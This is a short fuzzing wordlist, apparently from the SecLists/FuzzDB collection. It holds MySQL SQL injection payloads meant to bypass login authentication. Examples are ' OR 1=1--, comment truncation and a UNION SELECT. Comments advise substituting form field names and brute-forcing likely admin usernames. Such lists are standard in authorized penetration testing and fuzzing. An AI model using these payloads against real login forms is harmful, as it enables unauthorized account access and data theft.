SecLists/Fuzzing/FUZZDB_MySQL_SQLi_LoginBypass.txt
2012-08-26 20:04:09 -07:00

9 lines
374 B
Plaintext

# regex replace as many as you can with your fuzzer for best results:
# <user-fieldname> <pass-fieldname> <username>
# also try to brute force a list of possible usernames, including possile admin acct names
<username>' OR 1=1--
'OR '' = ' Allows authentication without a valid username.
<username>'--
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
'OR 1=1--